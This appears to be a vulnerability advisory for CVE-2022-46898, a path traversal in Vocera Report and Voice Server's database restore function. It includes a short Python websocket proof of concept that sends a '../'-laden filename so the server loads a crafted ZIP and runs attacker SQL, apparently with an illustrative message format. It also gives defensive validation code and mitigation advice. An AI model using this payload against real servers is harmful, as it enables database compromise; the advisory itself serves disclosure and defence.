A significant security vulnerability has been discovered in the Vocera Report Server and Voice Server versions 5.x through 5.8. The vulnerability, tracked as CVE-2022-46898, is a path traversal via the "restore SQL data" filename. Because the filename is not properly validated, an attacker can point the restore function at a specially crafted ZIP archive located outside the intended directory and have the SQL commands it contains executed against the database.

Details

The Vocera Report Console, a component of the affected software, includes a websocket function to restore the database from a ZIP archive containing an SQL import file. However, the filename given to the function is not properly sanitized, allowing an attacker to include a path-traversal payload to escape the intended restoration directory.

An example of the vulnerability in action can be seen in this code snippet:

import websocket
import json

ws = websocket.WebSocket()

# Establish a connection to the Vocera Report Console websocket
ws.connect("ws://example.com/report-console")

# Prepare the malicious ZIP archive payload with path traversal
path_traversal_payload = "../../../../../../path/to/malicious/archive.zip"

# Send the "restore SQL data" command with the path traversal payload
restore_command = {
    "action": "restore",
    "data": {"filename": path_traversal_payload}
}

ws.send(json.dumps(restore_command))

The above code snippet demonstrates an attack against the Vocera Report Server: the attacker connects to the websocket and sends a restore request whose filename contains a path traversal sequence pointing to a malicious ZIP archive. That archive contains crafted SQL commands which, when executed as part of the restoration process, could compromise the database server.

Mitigation

To fix this vulnerability, Vocera must implement proper input validation and sanitization for the "restore SQL data" filename so that it cannot escape the intended restoration directory. Affected users should update their Vocera Report Server and Voice Server installations to the latest version once a security patch addressing this issue is released.
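The kind of check a restore endpoint needs is shown below. This is an added example, not Vocera's code: the function name, the restore directory and the sample archives are assumptions, and it only decides whether an untrusted filename may be used to locate a restore archive inside the configured directory.

```python
import os
from pathlib import Path


class InvalidRestoreFilename(ValueError):
    """Raised when a restore filename is malformed or escapes the restore directory."""


def resolve_restore_archive(restore_dir, filename: str) -> Path:
    """Return the absolute path of a ZIP archive that lies inside restore_dir.

    Hypothetical hardened counterpart of the "restore SQL data" entry point: the
    filename comes from an untrusted websocket client and must never leave restore_dir.
    """
    base = Path(restore_dir).resolve()
    # Reject empty names, absolute paths and any name carrying a directory component
    # (this is what stops "../" sequences before a path is ever built).
    if not filename or os.path.isabs(filename) or Path(filename).name != filename:
        raise InvalidRestoreFilename(f"bad filename: {filename!r}")
    if not filename.lower().endswith(".zip"):
        raise InvalidRestoreFilename("restore archive must be a .zip file")
    candidate = (base / filename).resolve()
    # Containment check after resolve(): also catches symlinks planted in restore_dir.
    if base not in candidate.parents:
        raise InvalidRestoreFilename("archive must reside inside the restore directory")
    if not candidate.is_file():
        raise InvalidRestoreFilename("archive does not exist")
    return candidate


def demo() -> dict:
    """Exercise the check against a constructed restore directory (sample data only)."""
    import tempfile
    import zipfile
    with tempfile.TemporaryDirectory() as tmp:
        restore_dir = Path(tmp) / "restore"
        restore_dir.mkdir()
        with zipfile.ZipFile(restore_dir / "backup.zip", "w") as zf:
            zf.writestr("import.sql", "-- constructed sample dump\n")
        # An archive one level up: reachable only if traversal were allowed.
        with zipfile.ZipFile(Path(tmp) / "outside.zip", "w") as zf:
            zf.writestr("import.sql", "-- must never be reachable\n")
        results = {}
        for name in ["backup.zip", "../outside.zip", "/var/tmp/outside.zip", "backup.sql", "missing.zip"]:
            try:
                resolve_restore_archive(restore_dir, name)
                results[name] = "accepted"
            except InvalidRestoreFilename:
                results[name] = "rejected"
        return results
```

Only the plain archive name inside the restore directory is accepted; every traversal, absolute-path, wrong-extension and non-existent name is rejected before any restore work starts.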

- Vocera Report Server: https://www.vocera.com/products/report-server
- Vocera Voice Server: https://www.vocera.com/products/voice-server
- CVE-2022-46898 Details: https://nvd.nist.gov/vuln/detail/CVE-2022-46898
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): https://cwe.mitre.org/data/definitions/22.html

Conclusion

CVE-2022-46898 is a critical vulnerability, as successful exploitation can compromise the databases of both the Vocera Report Server and Voice Server. Keeping the affected installations updated is essential to prevent such incidents and to maintain the overall security and reliability of the systems.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 01:21:00 UTC